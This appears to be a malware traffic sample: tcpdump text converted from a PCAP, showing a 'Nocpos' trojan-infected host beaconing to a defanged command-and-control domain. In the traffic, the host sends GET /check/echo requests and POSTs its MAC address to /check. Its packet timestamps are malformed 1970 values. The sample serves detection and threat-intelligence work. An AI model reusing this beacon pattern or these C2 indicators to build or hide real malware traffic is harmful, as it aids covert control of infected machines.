Nocpos Trojan Malware PCAP Converted Traffic Sample Low Detection Rate

June 20, 2015

1970-01-01 -3:-59:-35.837643 IP 10.0.2.15.1025 > 10.0.2.2.53: 24554+ A? support.wordpress-dark[.]com. (44)
1970-01-01 -3:-59:-35.856699 IP 10.0.2.2.53 > 10.0.2.15.1025: 24554 2/2/0 A 104.28.4.94, A 104.28.5.94 (127)
1970-01-01 -3:-59:-35.858658 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [S], seq 2059076059, win 64240, options [mss 1460,nop,nop,sackOK], length 0
1970-01-01 -3:-59:-35.862945 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 2059076060, win 65535, options [mss 1460], length 0
1970-01-01 -3:-59:-35.863655 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [.], ack 1, win 64240, length 0
1970-01-01 -3:-59:-35.865224 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 1:63, ack 1, win 64240, length 62
GET /check/echo HTTP/1.1
Host: support.wordpress-dark[.]com

1970-01-01 -3:-59:-35.865284 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 63, win 65535, length 0
1970-01-01 -3:-59:-35.902853 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 1:409, ack 63, win 65535, length 408
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:49:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175; expires=Thu, 17-Dec-15 03:49:35 GMT; path=/; domain=.wordpress-dark[.]com; HttpOnly
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a026d171c61383-LHR

2
up
0

1970-01-01 -3:-59:-35.911535 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 63:335, ack 409, win 63832, length 272
POST /check HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: support.wordpress-dark[.]com
Content-Length: 35
Cache-Control: no-cache
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

address=08-00-27-68-68-B9&dt1=&dt2=

1970-01-01 -3:-59:-35.911599 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 335, win 65535, length 0
1970-01-01 -3:-59:-34.081818 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 409:661, ack 335, win 65535, length 252
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:49:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a026d1b1d01383-LHR

1970-01-01 -3:-58:-57.088094 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 335:459, ack 661, win 63580, length 124
GET /check/echo HTTP/1.1
Host: support.wordpress-dark[.]com
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

1970-01-01 -3:-58:-57.088166 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 459, win 65535, length 0
1970-01-01 -3:-58:-57.129052 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 661:920, ack 459, win 65535, length 259
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:50:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a027ba1fe41383-LHR

2
up
0

1970-01-01 -3:-58:-57.132135 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 459:731, ack 920, win 63321, length 272
POST /check HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: support.wordpress-dark[.]com
Content-Length: 35
Cache-Control: no-cache
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

address=08-00-27-68-68-B9&dt1=&dt2=

1970-01-01 -3:-58:-57.132195 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 731, win 65535, length 0
1970-01-01 -3:-58:-57.187810 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 920:1172, ack 731, win 65535, length 252
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:50:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a027ba5fe81383-LHR
